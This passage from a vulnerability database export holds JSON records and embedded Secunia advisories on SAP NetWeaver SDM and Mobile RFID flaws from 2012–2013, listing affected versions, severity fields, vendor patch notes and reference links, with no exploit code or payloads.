"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "d040cf88-1f3a-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "c0d6ce62-1f3a-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "c30432ce-1f3a-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "bbf8d5a2-1f3a-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "c9309bba-1f3a-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "d040cf88-1f3a-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "c0d6ce62-1f3a-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "c30432ce-1f3a-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "bbf8d5a2-1f3a-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "c9309bba-1f3a-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "d040cf88-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c0d6ce62-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c30432ce-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "bbf8d5a2-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c9309bba-1f3a-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver SDM service has an unspecified error that allows an attacker to exploit a vulnerability to bypass authentication and perform restricted operations. SAP NetWeaver is prone to multiple security vulnerabilities. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver SDM Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA51740\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/51740/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51740\n\nRELEASE DATE:\n2013-01-23\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/51740/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/51740/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51740\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nERPScan has reported multiple vulnerabilities in SAP NetWeaver, which\ncan be exploited by malicious people to disclose certain sensitive\ninformation, bypass certain security restrictions, and cause a DoS\n(Denial of Service). \n\nSOLUTION:\nApply SAP Note 1724516. \n\nPROVIDED AND/OR DISCOVERED BY:\nAlexander Polyakov, ERPScan. \n\nORIGINAL ADVISORY:\nSAP:\nhttps://service.sap.com/sap/support/notes/1724516\n\nERPScan (DSECRG-12-044, DSECRG-12-045, DSECRG-12-046, DSECRG-12-047,\nDSECRG-12-048):\nhttp://erpscan.com/advisories/dsecrg-12-044-sap-netweaver-sdm-authentication-bypass/\nhttp://erpscan.com/advisories/dsecrg-12-045-sap-netweaver-sdm-denial-of-service/\nhttp://erpscan.com/advisories/dsecrg-12-046-sap-netweaver-sdm-information-disclosure-and-smbrelay/\nhttp://erpscan.com/advisories/dsecrg-12-047-sap-netweaver-sdm-admin-information-disclosure/\nhttp://erpscan.com/advisories/dsecrg-12-048-sap-netweaver-sdm-admin-dos/\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00534"
},
{
"db": "CNVD",
"id": "CNVD-2013-00529"
},
{
"db": "CNVD",
"id": "CNVD-2013-00531"
},
{
"db": "CNVD",
"id": "CNVD-2013-00527"
},
{
"db": "CNVD",
"id": "CNVD-2013-00532"
},
{
"db": "BID",
"id": "57523"
},
{
"db": "IVD",
"id": "d040cf88-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c0d6ce62-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c30432ce-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "bbf8d5a2-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c9309bba-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "119745"
}
],
"trust": 3.96
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "57523",
"trust": 3.9
},
{
"db": "SECUNIA",
"id": "51740",
"trust": 3.1
},
{
"db": "CNVD",
"id": "CNVD-2013-00527",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2013-00532",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2013-00531",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2013-00534",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2013-00529",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201301-502",
"trust": 0.6
},
{
"db": "IVD",
"id": "D040CF88-1F3A-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "C0D6CE62-1F3A-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "C30432CE-1F3A-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "BBF8D5A2-1F3A-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "C9309BBA-1F3A-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "119745",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "d040cf88-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c0d6ce62-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c30432ce-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "bbf8d5a2-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c9309bba-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00534"
},
{
"db": "CNVD",
"id": "CNVD-2013-00529"
},
{
"db": "CNVD",
"id": "CNVD-2013-00531"
},
{
"db": "CNVD",
"id": "CNVD-2013-00527"
},
{
"db": "CNVD",
"id": "CNVD-2013-00532"
},
{
"db": "BID",
"id": "57523"
},
{
"db": "PACKETSTORM",
"id": "119745"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-502"
}
]
},
"id": "VAR-201301-0447",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "d040cf88-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c0d6ce62-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c30432ce-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "bbf8d5a2-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c9309bba-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00534"
},
{
"db": "CNVD",
"id": "CNVD-2013-00529"
},
{
"db": "CNVD",
"id": "CNVD-2013-00531"
},
{
"db": "CNVD",
"id": "CNVD-2013-00527"
},
{
"db": "CNVD",
"id": "CNVD-2013-00532"
}
],
"trust": 4.26917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 4.0
}
],
"sources": [
{
"db": "IVD",
"id": "d040cf88-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c0d6ce62-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c30432ce-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "bbf8d5a2-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c9309bba-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00534"
},
{
"db": "CNVD",
"id": "CNVD-2013-00529"
},
{
"db": "CNVD",
"id": "CNVD-2013-00531"
},
{
"db": "CNVD",
"id": "CNVD-2013-00527"
},
{
"db": "CNVD",
"id": "CNVD-2013-00532"
}
]
},
"last_update_date": "2022-05-17T01:45:26Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver SDM Admin Denial of Service Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/31571"
},
{
"title": "Patch for SAP NetWeaver SDM Denial of Service Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/31512"
},
{
"title": "SAP NetWeaver SDM Information Disclosure Patch for SMBRelay Attack Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/31531"
},
{
"title": "SAP NetWeaver SDM verifies patches that bypass vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/31493"
},
{
"title": "Patch for SAP NetWeaver SDM Admin Information Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/31532"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00534"
},
{
"db": "CNVD",
"id": "CNVD-2013-00529"
},
{
"db": "CNVD",
"id": "CNVD-2013-00531"
},
{
"db": "CNVD",
"id": "CNVD-2013-00527"
},
{
"db": "CNVD",
"id": "CNVD-2013-00532"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://secunia.com/advisories/51740/http"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/57523"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/51740/#comments"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1724516"
},
{
"trust": 0.1,
"url": "http://erpscan.com/advisories/dsecrg-12-046-sap-netweaver-sdm-information-disclosure-and-smbrelay/"
},
{
"trust": 0.1,
"url": "http://erpscan.com/advisories/dsecrg-12-047-sap-netweaver-sdm-admin-information-disclosure/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51740"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://erpscan.com/advisories/dsecrg-12-045-sap-netweaver-sdm-denial-of-service/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/51740/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://erpscan.com/advisories/dsecrg-12-048-sap-netweaver-sdm-admin-dos/"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://erpscan.com/advisories/dsecrg-12-044-sap-netweaver-sdm-authentication-bypass/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00534"
},
{
"db": "CNVD",
"id": "CNVD-2013-00529"
},
{
"db": "CNVD",
"id": "CNVD-2013-00531"
},
{
"db": "CNVD",
"id": "CNVD-2013-00527"
},
{
"db": "CNVD",
"id": "CNVD-2013-00532"
},
{
"db": "BID",
"id": "57523"
},
{
"db": "PACKETSTORM",
"id": "119745"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-502"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "d040cf88-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c0d6ce62-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c30432ce-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "bbf8d5a2-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c9309bba-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00534"
},
{
"db": "CNVD",
"id": "CNVD-2013-00529"
},
{
"db": "CNVD",
"id": "CNVD-2013-00531"
},
{
"db": "CNVD",
"id": "CNVD-2013-00527"
},
{
"db": "CNVD",
"id": "CNVD-2013-00532"
},
{
"db": "BID",
"id": "57523"
},
{
"db": "PACKETSTORM",
"id": "119745"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-502"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-01-25T00:00:00",
"db": "IVD",
"id": "d040cf88-1f3a-11e6-abef-000c29c66e3d"
},
{
"date": "2013-01-25T00:00:00",
"db": "IVD",
"id": "c0d6ce62-1f3a-11e6-abef-000c29c66e3d"
},
{
"date": "2013-01-25T00:00:00",
"db": "IVD",
"id": "c30432ce-1f3a-11e6-abef-000c29c66e3d"
},
{
"date": "2013-01-25T00:00:00",
"db": "IVD",
"id": "bbf8d5a2-1f3a-11e6-abef-000c29c66e3d"
},
{
"date": "2013-01-25T00:00:00",
"db": "IVD",
"id": "c9309bba-1f3a-11e6-abef-000c29c66e3d"
},
{
"date": "2013-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00534"
},
{
"date": "2013-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00529"
},
{
"date": "2013-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00531"
},
{
"date": "2013-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00527"
},
{
"date": "2013-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00532"
},
{
"date": "2013-01-23T00:00:00",
"db": "BID",
"id": "57523"
},
{
"date": "2013-01-23T05:44:45",
"db": "PACKETSTORM",
"id": "119745"
},
{
"date": "2013-01-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201301-502"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00534"
},
{
"date": "2013-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00529"
},
{
"date": "2013-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00531"
},
{
"date": "2013-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00527"
},
{
"date": "2013-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00532"
},
{
"date": "2013-01-23T00:00:00",
"db": "BID",
"id": "57523"
},
{
"date": "2013-01-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201301-502"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201301-502"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver SDM Multiple Security Vulnerabilities",
"sources": [
{
"db": "BID",
"id": "57523"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-502"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Information leakage",
"sources": [
{
"db": "IVD",
"id": "c0d6ce62-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c30432ce-1f3a-11e6-abef-000c29c66e3d"
}
],
"trust": 0.4
}
}
var-201211-0449
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has a security vulnerability. The SAP NetWeaver application has a cross-site request forgery vulnerability that allows an attacker to build a malicious URI, entice a user to resolve, and perform malicious operations in the target user context. There is a security hole in SAP NetWeaver, and the Mobile RFID application lacks sufficient filtering for some of the inputs, which can lead to cross-site scripting attacks. SAP Netweaver is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: SAP NetWeaver Cross-Site Scripting and Request Forgery Vulnerabilities
SECUNIA ADVISORY ID: SA51248
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51248/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51248
RELEASE DATE: 2012-11-14
DISCUSS ADVISORY: http://secunia.com/advisories/51248/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/51248/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=51248
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: ERPScan has reported two vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to conduct cross-site scripting and request forgery attacks.
1) Certain unspecified input is not properly sanitised within the Mobile RFID application before being returned to the user.
2) The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain unspecified actions if a logged-in user visits a malicious web site.
The vulnerability is reported in version 7.x. Other versions may also be affected.
SOLUTION: Reportedly fixes have been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: 1) Alexander Polyakov, ERPScan 2) Alexey Tyurin, ERPScan
ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1669031 https://service.sap.com/sap/support/notes/1728500
ERPScan (DSECRG-12-041, DSECRG-12-042): http://erpscan.com/advisories/dsecrg-12-041-sap-netweaver-mobile-xss/ http://erpscan.com/advisories/dsecrg-12-042-sap-netweaver-soap-rfc-csrf/
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201211-0449",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.2,
"vendor": "spa",
"version": "7.0"
},
{
"model": "netweaver sap netweaver ehp1 sap netweaver ehp2 sap netweaver sp15 sap netweaver sp8 sap netweaver sap netweaver sap netweaver sap netweaver",
"scope": "eq",
"trust": 0.4,
"vendor": "spa",
"version": "7.07.07.07.07.07.107.307.027.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "IVD",
"id": "15856548-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "17469898-1f4c-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-6522"
},
{
"db": "CNVD",
"id": "CNVD-2012-6521"
},
{
"db": "BID",
"id": "56516"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexander Polyakov and Alexey Tyurin from ERPScan",
"sources": [
{
"db": "BID",
"id": "56516"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-270"
}
],
"trust": 0.9
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "15856548-1f4c-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
